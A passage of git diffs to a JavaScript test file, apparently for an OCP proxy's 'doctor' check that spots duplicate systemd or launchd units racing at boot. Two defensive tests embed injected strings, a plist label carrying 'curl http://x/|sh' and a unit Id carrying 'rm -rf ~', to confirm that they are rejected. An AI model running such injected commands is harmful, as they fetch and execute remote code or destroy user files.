+  assert.ok(check, "an 'unknown' verdict must now be visible in the output, not silently omitted");
+  assert.equal(check.level, "INFO", "must not be WARN (no confirmed conflict) or FAIL (must never block an upgrade)");
+  assert.ok(check.message.includes("could not verify"));
   assert.equal(result.ready_to_upgrade, true);
+  assert.equal(result.warn_count, 0, "INFO must not be counted as a warning");
 });
 
 test("runDoctor: skipNetwork=true skips the probe entirely, even when the injected run() would report a conflict", () => {
   // Proves the gate: skipNetwork must short-circuit before `run` is ever consulted — a test
-  // suite running with skipNetwork:true (the vast majority of this file's ~30 pre-existing
-  // doctor tests) must never touch a live systemctl/launchd, matching the existing
+  // suite running with skipNetwork:true (the vast majority of this file's pre-existing doctor
+  // tests) must never touch a live systemctl/launchd, matching the existing
   // service_running/oauth_ok block's own skipNetwork gate immediately above it in doctor.mjs.
   let runCalled = false;
   const result = runDoctor({
@@ -6920,6 +7203,55 @@ test("runDoctor: skipNetwork=true skips the probe entirely, even when the inject
     assert.equal(runCalled, false, "run() must never be invoked when skipNetwork is true");
     assert.ok(!r.checks.some(c => c.id === "multi_unit_boot_race"));
   });
+});
+
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — full pipeline via runDoctor (macOS — MED-3 blocker: previously untested):");
+
+test("MED-3: runDoctor on darwin — WARN message uses launchctl, NEVER systemctl (systemctl does not exist on macOS)", async () => {
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456", bind: "127.0.0.1" })],
+    ["/Library/LaunchDaemons/com.company.ocpd.plist", ocpPlist({ label: "com.company.ocpd", port: "3456", bind: "0.0.0.0" })],
+  ]);
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "darwin",
+    run: (cmd) => {
+      if (cmd.includes("for f in")) return blob;
+      if (cmd.includes("print-disabled")) return disabledLaunchctlBlob([["dev.ocp.proxy", false], ["com.company.ocpd", false]]);
+      throw new Error("unexpected: " + cmd);
+    },
+  });
+  const check = result.checks.find(c => c.id === "multi_unit_boot_race");
+  assert.ok(check, "expected a multi_unit_boot_race check to be pushed");
+  assert.equal(check.level, "WARN");
+  assert.ok(!check.message.includes("systemctl"), "must never suggest a systemctl command on macOS — that binary doesn't exist there");
+  assert.ok(check.message.includes("launchctl disable"), "must suggest the real macOS remediation");
+  assert.ok(check.message.includes("dev.ocp.proxy") && check.message.includes("com.company.ocpd"), "message must name both units");
+});
+
+test("MED-3: runDoctor on darwin — a maliciously-labeled plist never reaches the WARN message (would otherwise be copy-pasteable into a shell)", async () => {
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/evil.plist", ocpPlist({ label: 'evil"; curl http://x/|sh #', port: "3456" })],
+  ]);
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "darwin",
+    run: (cmd) => {
+      if (cmd.includes("for f in")) return blob;
+      if (cmd.includes("print-disabled")) return disabledLaunchctlBlob([["dev.ocp.proxy", false]]);
+      throw new Error("unexpected: " + cmd);
+    },
+  });
+  // Only ONE valid unit remains once the malformed Label is rejected → clear, no WARN at all,
+  // so the dangerous string can never appear in doctor's output at all.
+  assert.ok(!result.checks.some(c => c.id === "multi_unit_boot_race"));
 });
 
 runAsyncTests().then(() => Promise.all(pendingAsync)).then(() => {

--- a/test-features.mjs
+++ b/test-features.mjs
@@ -6665,6 +6665,41 @@ test("classifyMultiUnitRisk: systemctl unavailable for EITHER scope (null) → u
   assert.equal(classifyMultiUnitRisk({ platform: "linux", userShowOut: null, systemShowOut: null }).state, "unknown");
 });
 
+test("LOW-3: classifyMultiUnitRisk — systemctlNotFound=true (both scopes genuinely absent) → 'not-applicable', a state distinct from 'unknown'", () => {
+  const result = classifyMultiUnitRisk({
+    platform: "linux", userShowOut: null, systemShowOut: null, systemctlNotFound: true,
+  });
+  assert.equal(result.state, "not-applicable");
+  assert.notEqual(result.state, "unknown", "must be a genuinely distinct state, not a relabeled 'unknown'");
+});
+
+test("LOW-3: classifyMultiUnitRisk — systemctlNotFound=false (a real failure, not absence) stays 'unknown' even with null show-outs", () => {
+  const result = classifyMultiUnitRisk({
+    platform: "linux", userShowOut: null, systemShowOut: null, systemctlNotFound: false,
+  });
+  assert.equal(result.state, "unknown");
+});
+
+test("LOW-3: gatherUnitCandidates — systemctlNotFound requires BOTH scopes to fail with exit 127; an asymmetric failure (one 127, one a different error) stays 'unknown'-eligible, not 'not-applicable'", () => {
+  // If systemctl genuinely doesn't exist, BOTH calls (same binary) fail identically with exit
+  // 127 — that's the confident "not-applicable" case. A single scope failing with 127 while the
+  // other fails some OTHER way is a stranger, less confident shape that should not be
+  // upgraded to "the check doesn't apply here".
+  const notFound = () => { const e = new Error("command not found"); e.status = 127; throw e; };
+  const otherFailure = () => { throw new Error("permission denied"); };
+  const run = (cmd) => (cmd.includes("--user") ? notFound() : otherFailure());
+  const raw = gatherUnitCandidates(run, "linux");
+  assert.equal(raw.systemctlNotFound, false, "asymmetric failure (127 + non-127) must NOT be treated as a confident 'not found'");
+  assert.equal(classifyMultiUnitRisk(raw).state, "unknown");
+});
+
+test("LOW-3: gatherUnitCandidates — both scopes fail with exit 127 → systemctlNotFound=true", () => {
+  const notFound = () => { const e = new Error("command not found"); e.status = 127; throw e; };
+  const raw = gatherUnitCandidates(notFound, "linux");
+  assert.equal(raw.systemctlNotFound, true);
+  assert.equal(classifyMultiUnitRisk(raw).state, "not-applicable");
+});
+
 test("classifyMultiUnitRisk: two enabled OCP units on DIFFERENT ports → no false positive", () => {
   const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
   const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=9999`;
@@ -6911,6 +6946,43 @@ test("classifyMultiUnitRisk (macOS): disabledBlob unavailable (null) is PERMISSI
   assert.equal(result.state, "warn", "a missing disabledBlob must not suppress an otherwise-real conflict");
 });
 
+test("review round 4 (#230 false-claim correction): a unit disabled ONLY in the SYSTEM domain (not gui) is still excluded — proves the union genuinely incorporates system, not just gui", () => {
+  // The bug this fixes: an earlier revision never probed the system domain at all (claiming,
+  // falsely, that it required root), so a LaunchDaemon disabled via `sudo launchctl disable
+  // system/<label>` — precisely the remediation this file's OWN WARN message recommends for a
+  // LaunchDaemon conflict — kept being warned about forever. Putting the disabled entry ONLY in
+  // systemDisabledBlob (never in disabledBlob) is what distinguishes "the union really reads
+  // both domains" from a test that would pass even if systemDisabledBlob were ignored entirely.
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/ai.custom.ocp.plist", ocpPlist({ label: "ai.custom.ocp", port: "3456" })],
+  ]);
+  const result = classifyMultiUnitRisk({
+    platform: "darwin",
+    plistBlob: blob,
+    disabledBlob: disabledLaunchctlBlob([["dev.ocp.proxy", false]]), // gui domain: nothing disabled
+    systemDisabledBlob: disabledLaunchctlBlob([["ai.custom.ocp", true]]), // system domain: disabled here only
+  });
+  assert.equal(result.state, "clear", "ai.custom.ocp is disabled in the SYSTEM domain only — must still be excluded, leaving one live candidate");
+});
+
+test("review round 4: systemDisabledBlob unavailable (null) is ALSO permissive — a partial gather (gui succeeds, system fails, or vice versa) still filters what it CAN determine", () => {
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/ai.custom.ocp.plist", ocpPlist({ label: "ai.custom.ocp", port: "3456" })],
+  ]);
+  // gui succeeds and finds ai.custom.ocp is NOT gui-disabled (irrelevant, it's a LaunchDaemon);
+  // system read fails entirely (null) — must not escalate to "unknown", and must not silently
+  // drop the conflict just because one of the two reads failed.
+  const result = classifyMultiUnitRisk({
+    platform: "darwin",
+    plistBlob: blob,
+    disabledBlob: disabledLaunchctlBlob([["dev.ocp.proxy", false]]),
+    systemDisabledBlob: null,
+  });
+  assert.equal(result.state, "warn", "a failed system-domain read must not suppress an otherwise-real conflict — permissive, not 'unknown'");
+});
+
 console.log("\nMulti-unit boot-race pre-flight (issue #220) — gatherUnitCandidates (impure layer):");
 
 test("gatherUnitCandidates: listing fails (run throws) → showOut is null, not \"\" — never silently treated as zero enabled units", () => {
@@ -7034,13 +7106,20 @@ test("HIGH-1: gatherUnitCandidates (macOS) — a single shell command enumerates
   assert.ok(plistCmds[0].includes("/Library/LaunchDaemons"), "must scan /Library/LaunchDaemons");
 });
 
-test("gatherUnitCandidates (macOS): also issues a launchctl print-disabled read to cross-check persistent disables", () => {
+test("gatherUnitCandidates (macOS): issues launchctl print-disabled reads for BOTH the gui and system domains (review round 4: system is unprivileged too, not out of scope)", () => {
+  // Review round 4 on #230, false-claim correction: an earlier revision claimed the system
+  // domain "requires root to query" and left it unprobed. Verified false directly on a live
+  // host (uid 501, no sudo, `launchctl print-disabled system` exits 0) — and the false claim had
+  // a self-inflicted consequence, since this file's OWN WARN recommends `sudo launchctl disable
+  // system/<label>` for a LaunchDaemon conflict, so an operator who followed that advice was
+  // warned about the same, now-disabled unit forever.
   const capturedCmds = [];
   const run = (cmd) => { capturedCmds.push(cmd); return ""; };
   gatherUnitCandidates(run, "darwin");
   const disabledCmds = capturedCmds.filter(c => c.includes("print-disabled"));
-  assert.equal(disabledCmds.length, 1, "exactly one print-disabled read");
-  assert.ok(disabledCmds[0].includes("gui/"), "must query the gui/<uid> domain (covers every LaunchAgent, personal or system-wide)");
+  assert.equal(disabledCmds.length, 2, "exactly two print-disabled reads — gui domain AND system domain");
+  assert.ok(disabledCmds.some(c => c.includes("gui/")), "must query the gui/<uid> domain (covers every LaunchAgent, personal or system-wide)");
+  assert.ok(disabledCmds.some(c => /print-disabled system(\s|$|2>)/.test(c)), "must ALSO query the system domain (covers LaunchDaemons) — not just gui/<uid>");
 });
 
 test("MED-4 (real shell, verified mechanism): a non-matching TRAILING glob makes a bare for-loop throw and discard earlier real output — the trailing no-op fixes it", () => {
@@ -7298,26 +7377,55 @@ test("runDoctor: zero enabled units on either scope → no check pushed, no cras
   assert.equal(result.ready_to_upgrade, true);
 });
 
-test("MED-5: runDoctor — systemctl missing entirely (every call throws) → pushes a visible INFO line, distinguishable from a verified-clear host", async () => {
-  // Before this fix, "unknown" pushed nothing at all — indistinguishable from a genuinely
+test("MED-5: runDoctor — systemctl EXISTS but this probe fails for another reason (non-127 exit) → pushes a visible INFO line, distinguishable from a verified-clear host", async () => {
+  // Before the MED-5 fix, "unknown" pushed nothing at all — indistinguishable from a genuinely
   // clear host in the JSON output. That matters because `systemctl --user ...` fails without
   // XDG_RUNTIME_DIR/DBUS_SESSION_BUS_ADDRESS, which is exactly what `sudo`'s env_reset strips —
   // so `sudo ocp update` on a host whose OCP is a SYSTEM unit (the #215 shape) silently
   // degraded this whole check with no visible trace.
+  //
+  // LOW-3 (review round 4): the thrown error here deliberately has NO `.status` (unlike a real
+  // "command not found", which exits 127 — verified directly via execSync) — this is the
+  // "systemctl is present but something else went wrong" case (permission, timeout, transient
+  // error), which must still surface as INFO. The genuinely-absent case is the next test.
   const result = await runDoctor({
     skipNetwork: false,
     mockVersion: "v3.26.0",
     mockLatest: "v3.26.0",
     mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
     mockPlatform: "linux",
-    run: (cmd) => { throw new Error("systemctl: command not found"); },
+    run: (cmd) => { throw new Error("systemctl: unexpected failure (not command-not-found)"); },
   });
   const check = result.checks.find(c => c.id === "multi_unit_boot_race");
-  assert.ok(check, "an 'unknown' verdict must now be visible in the output, not silently omitted");
+  assert.ok(check, "an 'unknown' verdict must still be visible in the output, not silently omitted");
   assert.equal(check.level, "INFO", "must not be WARN (no confirmed conflict) or FAIL (must never block an upgrade)");
   assert.ok(check.message.includes("could not verify"));
   assert.equal(result.ready_to_upgrade, true);
   assert.equal(result.warn_count, 0, "INFO must not be counted as a warning");
+});
+
+test("LOW-3: runDoctor — systemctl genuinely NOT INSTALLED (exit 127, verified as the real signal) → 'not-applicable', NO push at all, never repeats forever", () => {
+  // The concern this fixes: on a non-systemd Linux host (container, WSL without systemd,
+  // OpenRC), EVERY `ocp update` was pushing an unactionable "could not verify" INFO line,
+  // forever, about a check that can never work there. Verified the real signal directly:
+  // execSync on a genuinely-missing binary (given as a shell command STRING, this file's own
+  // convention) exits 127 via the shell that resolves it — not a Node-level ENOENT on the
+  // execSync call itself. A thrown Error with `.status = 127` is therefore the realistic
+  // simulation of "systemctl isn't on this host at all", distinct from the previous test's
+  // generic failure.
+  const notFound = () => { const e = new Error("systemctl: command not found"); e.status = 127; throw e; };
+  return runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "linux",
+    run: notFound,
+  }).then((result) => {
+    assert.ok(!result.checks.some(c => c.id === "multi_unit_boot_race"),
+      "a genuinely-absent systemctl must push NOTHING — silent like 'clear', not a permanent unactionable INFO line on every future run");
+    assert.equal(result.ready_to_upgrade, true);
+  });
 });
 
 test("runDoctor: skipNetwork=true skips the probe entirely, even when the injected run() would report a conflict", () => {
@@ -7418,6 +7526,16 @@ assert blk.strip(), "empty doctor-check-surfacing slice - anchor drift"
 assert "'WARN'" in blk and "'INFO'" in blk, "slice missing WARN/INFO handling - anchor drift"
 assert 'case "$kind"' not in blk and '_cmd_update_restart' not in blk, \\
     "slice overgrown past the intended block - anchor drift"
+# Review round 4 on #230 (LOW-1): bash's double-quoted-string escaping unescapes FOUR forms
+# (\\", \\\\, \\$, \\\`) plus a backslash-newline line continuation - this block currently uses
+# ONLY \\", so a blanket blk.replace('\\"', '"') is exact TODAY. If a future edit introduces any
+# of the other forms, this harness and real bash would silently diverge (a literal backslash
+# would leak into the "python" this harness execs, or a variable would get mangled) - assert
+# BEFORE the replace that every single backslash in the raw slice is part of a \\" pair, so that
+# drift fails loudly here instead of silently testing something bash would never actually run.
+for i, ch in enumerate(blk):
+    if ch == '\\\\' and (i + 1 >= len(blk) or blk[i + 1] != '"'):
+        raise AssertionError("slice contains a bash escape form other than \\\\\\" (\\\\\\\\, \\\\$, backtick, or line-continuation) - the blanket unescape below no longer matches what bash actually produces at runtime; update it")
 blk = blk.replace('\\\\"', '"')
 d = json.loads(sys.argv[2])
 exec(blk)
@@ -7459,6 +7577,45 @@ test("ocp cmd_update's real doctor-check-surfacing block: WARN and INFO both pri
     { level: "INFO", message: "info one" },
   ]);
   assert.equal(out, "⚠ warn one\nℹ info one\n");
+});
+
+test("LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block survives an ASCII-only locale where the glyphs can't be printed — set -e must not kill cmd_update silently", () => {
+  // The actual bug found on review round 4: under `set -euo pipefail` (ocp:7), a non-zero exit
+  // from this python pipeline kills `cmd_update` immediately, and `2>/dev/null` hides why.
+  // Verified directly before this fix: `env -i LC_ALL=C PYTHONUTF8=0 bash` on the block raised a
+  // UnicodeEncodeError trying to print "⚠"/"ℹ" under the C locale's ASCII-only stdout encoding,
+  // exiting 1 before even reaching the kind dispatch below it — silently aborting the whole
+  // update. This PR's own INFO addition made the block fire far more often (it used to print
+  // nothing on most healthy hosts). Reproduced against the REAL, current `ocp` file (not a
+  // hand-copied snippet): extract the actual doctor-check-surfacing if-block, wrap it in a
+  // minimal harness script, and run it under the exact failing environment.
+  const src = spotReadFileSync(join(_spotDir, "ocp"), "utf8");
+  const startMarker = '  if [[ -n "$doctor_json" ]]; then';
+  const endMarker = "\n  fi";
+  const si = src.indexOf(startMarker);
+  assert.ok(si !== -1, "anchor drift: could not find the doctor-check-surfacing if-block start");
+  const ei = src.indexOf(endMarker, si);
+  assert.ok(ei !== -1 && ei > si, "anchor drift: could not find the doctor-check-surfacing if-block end");
+  const block = src.slice(si, ei + endMarker.length);
+  assert.ok(block.includes("reconfigure"), "anchor drift: extracted block is missing the errors=\"replace\" fix entirely");
+
+  const scratch = mkdtempSync(join(tmpdir(), "ocp-low2-test-"));
+  try {
+    const scriptPath = join(scratch, "repro.sh");
+    writeFileSync(scriptPath, [
+      "#!/bin/bash",
+      "set -euo pipefail",
+      `doctor_json='{"checks":[{"level":"WARN","message":"warn msg"},{"level":"INFO","message":"info msg"}]}'`,
+      block,
+      'echo "REACHED_AFTER_BLOCK"',
+      "",
+    ].join("\n"));
+    const out = execFileSync("env", ["-i", "LC_ALL=C", "PYTHONUTF8=0", "bash", scriptPath], { encoding: "utf8" });
+    assert.ok(out.includes("REACHED_AFTER_BLOCK"),
+      "cmd_update must survive past this block even when the glyphs can't be encoded in the active locale — set -e must not silently kill it");
+  } finally {
+    rmSync(scratch, { recursive: true, force: true });
+  }
 });
 
 runAsyncTests().then(() => Promise.all(pendingAsync)).then(() => {

--- a/test-features.mjs
+++ b/test-features.mjs
@@ -6562,6 +6562,366 @@ test("ocp-connect: the hardcoded three-id JSON-parse-failure fallback never over
   }
 });
 
+// ═══════════════════════════════════════════════════════════════════════════
+// ── Multi-unit boot-race pre-flight check (issue #220, incident #215) ──
+// New section — kept self-contained (own imports, own console.log header) so a
+// rebase against concurrent test-features.mjs PRs is a clean insert (main moves
+// frequently and other PRs touch this file — see AGENTS.md testing notes).
+//
+// Background: on a real host, a system-scope systemd unit and a user-scope
+// systemd unit were BOTH enabled and both pointed at the same server.mjs
+// working tree and the same OCP port, with drifted config (different bind
+// address, different CLAUDE_BIN). Whichever won the boot race silently decided
+// the host's LAN reachability, and nothing in `ocp doctor` surfaced it. See
+// scripts/doctor.mjs's classifyMultiUnitRisk / gatherUnitCandidates /
+// detectMultiUnitBootRace and issue #215 for the live evidence.
+//
+// This is a STATIC config cross-reference (which units WOULD start at boot,
+// and do any two collide) — deliberately independent of scripts/lib/
+// restart-unit.mjs (PR #221), which resolves a DIFFERENT, live-PID question
+// for the restart phase. See the PR body for the explicit dependency decision.
+//
+// Every test here is BEHAVIORAL: it calls the exported classifier/gatherer (or
+// runDoctor with an injected opts.run) and asserts on return values / pushed
+// checks — never on scripts/doctor.mjs's source text.
+// ═══════════════════════════════════════════════════════════════════════════
+import { classifyMultiUnitRisk, gatherUnitCandidates } from "./scripts/doctor.mjs";
+
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — classifyMultiUnitRisk:");
+
+// Realistic `systemctl show <units> -p Id -p ExecStart -p Environment` output, matching the
+// exact field-incident shape from issue #215: system unit ocp.service (bind 0.0.0.0), user
+// unit ocp-proxy.service (bind 127.0.0.1), same working tree, same port.
+const FIELD_INCIDENT_USER_SHOW =
+  `Id=ocp-proxy.service\n` +
+  `ExecStart={ path=/usr/bin/node ; argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; ignore_errors=no }\n` +
+  `Environment=CLAUDE_PROXY_PORT=3456 CLAUDE_BIND=127.0.0.1 CLAUDE_BIN=/usr/bin/claude`;
+const FIELD_INCIDENT_SYSTEM_SHOW =
+  `Id=ocp.service\n` +
+  `ExecStart={ path=/home/opc/.npm-global/bin/node ; argv[]=/home/opc/.npm-global/bin/node /home/opc/ocp/server.mjs ; ignore_errors=no }\n` +
+  `Environment=CLAUDE_PROXY_PORT=3456 CLAUDE_BIND=0.0.0.0 CLAUDE_BIN=/home/opc/.npm-global/bin/claude`;
+
+test("classifyMultiUnitRisk: reproduces the exact issue #215 field incident — WARN, both units named, bind addresses captured", () => {
+  const result = classifyMultiUnitRisk({
+    platform: "linux",
+    userShowOut: FIELD_INCIDENT_USER_SHOW,
+    systemShowOut: FIELD_INCIDENT_SYSTEM_SHOW,
+  });
+  assert.equal(result.state, "warn");
+  assert.equal(result.groups.length, 1);
+  const group = result.groups[0];
+  assert.equal(group.length, 2);
+  const names = group.map(u => u.name).sort();
+  assert.deepEqual(names, ["ocp-proxy.service", "ocp.service"]);
+  const byName = Object.fromEntries(group.map(u => [u.name, u]));
+  assert.equal(byName["ocp-proxy.service"].scope, "user");
+  assert.equal(byName["ocp-proxy.service"].bind, "127.0.0.1");
+  assert.equal(byName["ocp.service"].scope, "system");
+  assert.equal(byName["ocp.service"].bind, "0.0.0.0");
+});
+
+test("classifyMultiUnitRisk: only ONE enabled OCP unit → clear (no boot race possible)", () => {
+  const result = classifyMultiUnitRisk({
+    platform: "linux",
+    userShowOut: FIELD_INCIDENT_USER_SHOW,
+    systemShowOut: "",
+  });
+  assert.equal(result.state, "clear");
+});
+
+test("classifyMultiUnitRisk: ZERO enabled units (both scopes empty) → clear, no crash", () => {
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: "", systemShowOut: "" });
+  assert.equal(result.state, "clear");
+});
+
+test("classifyMultiUnitRisk: systemctl unavailable for EITHER scope (null) → unknown, never a false all-clear", () => {
+  // null means "couldn't gather" (missing binary, non-zero exit) — must never be conflated
+  // with "" (ran fine, confirmed nothing enabled). Conflating the two is exactly the false
+  // all-clear this check must not produce.
+  assert.equal(classifyMultiUnitRisk({ platform: "linux", userShowOut: null, systemShowOut: "" }).state, "unknown");
+  assert.equal(classifyMultiUnitRisk({ platform: "linux", userShowOut: "", systemShowOut: null }).state, "unknown");
+  assert.equal(classifyMultiUnitRisk({ platform: "linux", userShowOut: null, systemShowOut: null }).state, "unknown");
+});
+
+test("classifyMultiUnitRisk: two enabled OCP units on DIFFERENT ports → no false positive", () => {
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=9999`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "clear", "same tree but different port is not the #215 failure shape");
+});
+
+test("classifyMultiUnitRisk: two enabled OCP units on the SAME port but DIFFERENT working tree → no false positive", () => {
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/other-ocp-install/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "clear", "same port but a different install directory is not the #215 failure shape");
+});
+
+test("classifyMultiUnitRisk: enabled units that AREN'T OCP (no server.mjs in ExecStart) never count toward a group", () => {
+  const userShow = `Id=nginx.service\nExecStart={ argv[]=/usr/sbin/nginx -g daemon\\ off\\; ; }\nEnvironment=`;
+  const systemShow = `Id=cron.service\nExecStart={ argv[]=/usr/sbin/cron -f ; }\nEnvironment=`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "clear");
+});
+
+test("classifyMultiUnitRisk: absent CLAUDE_PROXY_PORT/CLAUDE_BIND degrades to documented defaults, still groups correctly", () => {
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "warn");
+  assert.equal(result.groups[0][0].port, "3456", "absent CLAUDE_PROXY_PORT must default to DEFAULT_PORT, not crash/mismatch");
+  assert.ok(result.groups[0].every(u => u.bind === "(default bind)"));
+});
+
+test("classifyMultiUnitRisk: an unvalidated/malformed unit Id is rejected, never trusted into a group", () => {
+  // Defense in depth (same trust-boundary class as PR #221's MED-5 finding on restart-unit.mjs):
+  // a systemd `Id=` should always be a safe unit name, but this must not blindly assume that —
+  // it re-validates at the point the name would be surfaced/used, exactly like restart-unit.mjs
+  // re-checks its own resolved unit name before it reaches a shell command.
+  const userShow = `Id=a;rm -rf ~.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "clear", "the malformed Id must be dropped entirely, leaving only one valid unit");
+});
+
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — macOS (launchd):");
+
+function plistBlob(files) {
+  return files.map(([path, content]) => `===OCP-DOCTOR-FILE:${path}===\n${content}`).join("\n");
+}
+function ocpPlist({ label, port, bind }) {
+  return `<key>RunAtLoad</key><true/>` +
+    `<key>Label</key><string>${label}</string>` +
+    `<key>ProgramArguments</key><array><string>/usr/bin/node</string><string>/Users/opc/ocp/server.mjs</string></array>` +
+    (port ? `<key>CLAUDE_PROXY_PORT</key><string>${port}</string>` : "") +
+    (bind ? `<key>CLAUDE_BIND</key><string>${bind}</string>` : "");
+}
+
+test("classifyMultiUnitRisk (macOS): two enabled plists, same tree+port → WARN — the launchd analogue of the field incident", () => {
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456", bind: "127.0.0.1" })],
+    ["/Library/LaunchDaemons/ai.custom.ocp.plist", ocpPlist({ label: "ai.custom.ocp", port: "3456", bind: "0.0.0.0" })],
+  ]);
+  const result = classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob });
+  assert.equal(result.state, "warn");
+  assert.equal(result.groups[0].length, 2);
+  const scopes = result.groups[0].map(u => u.scope).sort();
+  assert.deepEqual(scopes, ["system", "user"], "LaunchDaemons path classifies as system scope, LaunchAgents as user");
+});
+
+test("classifyMultiUnitRisk (macOS): only the standard single OCP LaunchAgent present → clear (the common case)", () => {
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456", bind: "127.0.0.1" })],
+  ]);
+  assert.equal(classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob }).state, "clear");
+});
+
+test("classifyMultiUnitRisk (macOS): zero plist files at all → clear, no crash", () => {
+  assert.equal(classifyMultiUnitRisk({ platform: "darwin", plistBlob: "" }).state, "clear");
+});
+
+test("classifyMultiUnitRisk (macOS): plist enumeration unavailable/unreadable (null) → unknown, never a false all-clear", () => {
+  assert.equal(classifyMultiUnitRisk({ platform: "darwin", plistBlob: null }).state, "unknown");
+});
+
+test("classifyMultiUnitRisk (macOS): a plist without RunAtLoad=true never counts (wouldn't actually auto-start)", () => {
+  const disabledPlist = `<key>Label</key><string>dev.ocp.proxy</string>` +
+    `<key>ProgramArguments</key><array><string>/usr/bin/node</string><string>/Users/opc/ocp/server.mjs</string></array>`;
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/stopped.plist", disabledPlist],
+  ]);
+  assert.equal(classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob }).state, "clear");
+});
+
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — gatherUnitCandidates (impure layer, PR #221 MED-6 lesson):");
+
+// PR #221's independent review (MED-6) found the IMPURE gathering layer had zero coverage and
+// that's exactly where the real defects lived (a platform-branch swap and a null-handling bug
+// both survived mutation undetected in that PR's first draft). These tests drive
+// gatherUnitCandidates directly with a fake `run` that pattern-matches on command strings —
+// the same lesson applied here before it could repeat.
+
+test("gatherUnitCandidates: listing fails (run throws) → showOut is null, not \"\" — never silently treated as zero enabled units", () => {
+  const run = (cmd) => { throw new Error(`systemctl: command not found`); };
+  const raw = gatherUnitCandidates(run, "linux");
+  assert.equal(raw.userShowOut, null);
+  assert.equal(raw.systemShowOut, null);
+});
+
+test("gatherUnitCandidates: listing succeeds with zero candidates → showOut is \"\" (confirmed empty), skips the show call entirely", () => {
+  let showCalled = false;
+  const run = (cmd) => {
+    if (/list-unit-files/.test(cmd)) return ""; // no enabled .service units at all
+    showCalled = true;
+    return "should not be reached";
+  };
+  const raw = gatherUnitCandidates(run, "linux");
+  assert.equal(raw.userShowOut, "");
+  assert.equal(raw.systemShowOut, "");
+  assert.equal(showCalled, false, "show must not be invoked with an empty candidate list");
+});
+
+test("gatherUnitCandidates: listing succeeds with candidates, but the show call fails → showOut is null (unknown), not \"\"", () => {
+  const run = (cmd) => {
+    if (/list-unit-files/.test(cmd)) return "ocp-proxy.service enabled\n";
+    if (/show/.test(cmd)) throw new Error("systemctl show: timed out");
+    throw new Error("unexpected: " + cmd);
+  };
+  const raw = gatherUnitCandidates(run, "linux");
+  assert.equal(raw.userShowOut, null);
+  assert.equal(raw.systemShowOut, null);
+});
+
+test("gatherUnitCandidates: batches ALL candidates into ONE show call per scope — never one spawn per unit", () => {
